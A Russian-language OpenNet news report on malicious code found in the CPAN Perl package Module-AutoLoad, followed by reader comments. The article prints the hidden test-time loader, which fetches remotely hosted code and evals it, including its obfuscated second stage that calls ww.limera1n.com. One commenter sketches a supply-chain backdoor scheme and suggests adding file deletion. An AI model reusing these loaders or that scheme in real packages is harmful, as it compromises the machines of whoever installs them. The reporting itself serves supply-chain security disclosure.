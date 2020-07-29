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В Perl-пакете Module-AutoLoad выявлен вредоносный код

29.07.2020 11:27

В распространяемом через каталог CPAN Perl-пакете Module-AutoLoad, предназначенном для автоматической загрузки CPAN-модулей на лету, выявлен вредоносный код. Вредоносная вставка была найдена в коде теста 05_rcx.t, который поставляется с 2011 года. Примечательно, что вопросы о загрузке сомнительного кода возникали на Stackoverflow ещё в 2016 году.

Вредоносная активность сводится к попытке загрузки и выполнения кода со стороннего сервера (http://r.cx:1/) в процессе выполнения тестового набора, запускаемого при установке модуля. Предполагается, что изначально загружаемый с внешнего сервера код не был вредоносным, но теперь запрос перенаправляется на домен ww.limera1n.com, отдающий свою порцию кода для выполнения.

Для организации загрузки в файле 05_rcx.t используется следующий код: 


   my $prog = __FILE__;
   $prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
   my $try = `$^X $prog`;

Указанный код приводит к выполнению скрипта ../contrib/RCX.pl, содержимое которого сводится к строке: 


   use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};

Данный скрипт загружает запутанный при помощи сервиса perlobfuscator.com код с внешнего хоста r.cx (коды символов 82.46.99.88 соответствуют тексту "R.cX") и выполняет его в блоке eval. 


   $ perl -MIO::Socket -e'$b=new IO::Socket::INET 82.46.99.88.":1"; print <$b>;'
   eval unpack u=>q{_<')I;G1[)&(];F5W($E/.CI3;V-K970Z.DE....}

После распаковки в итоге выполняется следующий код: 


   print{$b=new IO::Socket::INET"ww.limera1n.com:80"}"GET /iJailBreak
";eval<$b>or return warn$@while$b;1

В настоящее время проблемный пакет удалён из хранилища PAUSE (Perl Authors Upload Server), а учётная запись автора модуля заблокирована. При этом модуль пока остаётся доступен в архиве MetaCPAN и может быть напрямую установлен с MetaCPAN при помощи некоторых утилит, таких как cpanminus. Отмечается, что пакет не был широко распространён.

Интересно, что к обсуждению подключился и автор модуля, который опроверг информацию о том, что вредоносный код подставлен после взлома его сайта "r.cx" и пояснил, что он просто так развлекался, а perlobfuscator.com использовал не для скрытия чего-то, а для сокращения размера кода и упрощения его копирования через буфер обмена. Выбор названия функции "botstrap" пояснён тем, что это слово "звучит как bot и короче, чем bootstrap". Автор модуля также заверил, что выявленные манипуляции не совершают вредоносных действий, а лишь демонстрируют загрузку и выполнение кода по TCP.

  1. Главная ссылка к новости (https://news.perlfoundation.or...)
  2. OpenNews: В RubyGems выявлено 724 вредоносных пакета
  3. OpenNews: В каталоге Python-пакетов PyPI выявлены две вредоносные библиотеки
  4. OpenNews: В репозитории NPM выявлен вредоносный пакет bb-builder. Выпуск NPM 6.11
  5. OpenNews: В зависимостях к npm-пакету с установщиком PureScript выявлены вредоносные изменения
  6. OpenNews: В каталоге PyPI выявлены вредоносные пакеты
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/53448-perl
Ключевые слова: perl, cpan, malware
При перепечатке указание ссылки на opennet.ru обязательно
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  • 1.1, Аноним (1), 11:49, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –8 +/
    cpan это зло
     
     
  • 2.26, бублички (?), 14:13, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    ты побежишь выбрасывать все ножи когда узнаешь сколько людей от них погибает ежегодно в одном только твоём Барнауле
     

  • 1.2, lurkr (ok), 11:57, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +9 +/
    >> Данный скрипт загружает запутанный при помощи сервиса perlobfuscator.com код

    перлу это не требуется, можно было оставить все как есть )))

     
     
  • 2.4, user90 (?), 12:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Ну как тебе сказать.. если попросить какого-нибудь петон-нуба, то у него именно так и выйдет.
     

  • 1.3, user90 (?), 11:58, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Как-то ниачем: когда именно была сделана? С какого аккаунта? Шерлоки млин)
     
     
  • 2.5, ss (??), 12:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Там же сказано- автор впендюрил это туда для развлечения. шутка.
     
     
  • 3.6, user90 (?), 12:08, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Читал по диагонали :)
     
     
  • 4.23, Q2W (?), 14:00, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Ну ты и Лестрейд, блин.
     

  • 1.7, имя_ (?), 12:25, 29/07/2020 Скрыто модератором [﹢﹢﹢] [ · · · ]
    		• –1 +/
     
     
  • 2.9, Аноним (9), 12:29, 29/07/2020 Скрыто модератором
    		• +/
     

  • 1.8, Аноним (9), 12:28, 29/07/2020 Скрыто модератором [﹢﹢﹢] [ · · · ]
    		• +/
     
  • 1.10, mos87 (ok), 12:34, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    что лишний раз показывает, неважно какой язык - люди всегда одинаковые.
     
  • 1.11, mos87 (ok), 12:37, 29/07/2020 Скрыто модератором [﹢﹢﹢] [ · · · ]
    		• –1 +/
     
  • 1.12, mos87 (ok), 12:46, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    собсно в том треде от 2016 на SO почти всё сказано.
    в т.ч. очевидная мыслЯ, что такую фигню использовать очень-очень айайай.

    так что ССЗБ

     
     
  • 2.17, Аноним (17), 13:18, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Расту и ноде значит норм, а тут ай ай ай? Получаются, у перл разрабов культура напрочь отсутствует, раз они способны такое провернуть.
     
     
  • 3.19, mos87 (ok), 13:21, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +1 +/
    шта? ты либо нихера не понял либо напейсал херню, но вероятнее и то и другое
     
     
  • 4.21, Аноним (17), 13:26, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    Т.е. версии, что это ты тупорез, ты принципиально не рассматриваешь?
     

  • 1.13, Аноним (13), 12:48, 29/07/2020 Скрыто модератором [﹢﹢﹢] [ · · · ]
    		• +1 +/
     
  • 1.14, mos87 (ok), 12:56, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    perl -e "print 82.46.99.88" хехе.

    18:38:44 < veesh> i just noticed now that the OP on the SO question was
    asking how to port the code to python
    18:39:00 < veesh> i'm glad that all those people left perl 20 years ago

    ))

     
  • 1.15, mos87 (ok), 12:58, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –4 +/
    >Автор модуля также заверил, что выявленные манипуляции не совершают вредоносных действий, а лишь демонстрируют

    что вся эта модная фигня хипсто- и макако- (на выбор) язычков не есть ничто новое. Но Perl жЫ УсТАрЕл!!111

    ЗЫ более того, афтор сего творения подтралил в конце своего поста - "And I honestly don't know if Python is powerful enough to do anything like this"

     
  • 1.16, yet another anonymous (?), 13:15, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +2 +/
    Так дело не в языке. А в "автоподтягивании".
     
     
  • 2.25, mos87 (ok), 14:12, 29/07/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    я об этом выше и постил
     

  • 1.20, Sw00p aka Jerom (?), 13:23, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    Название модуля само за себя говорит, чему тут удивляться, автор решил ещё потестить загрузку через сеть :)
     
  • 1.22, Аноним (22), 13:58, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +1 +/
    Всё правильно сделал. Нужно ещё было удаление всех доступных на запись файлов добавить. Ибо экосистемы пакетов и сложившиеся практики разработки ПО - это очень удобно для бэкдорщиков. Создаёшь полезный пакет, в него пихаешь зависимость от другого контролируемого собой (возможно под другим именем), рядом - ещё десяток, в свой - так же, и так пока не решишь, что пора вставить бэкдор. Никто и не найдёт - нет никому охоты в зависимостях копаться.
     
  • 1.24, бублички (?), 14:07, 29/07/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    > пояснил, что он просто так развлекался

    с привеликим удовольствием, съездил бы автору по щам. в целях развлечения конечно-же - не со зла или корысти

     

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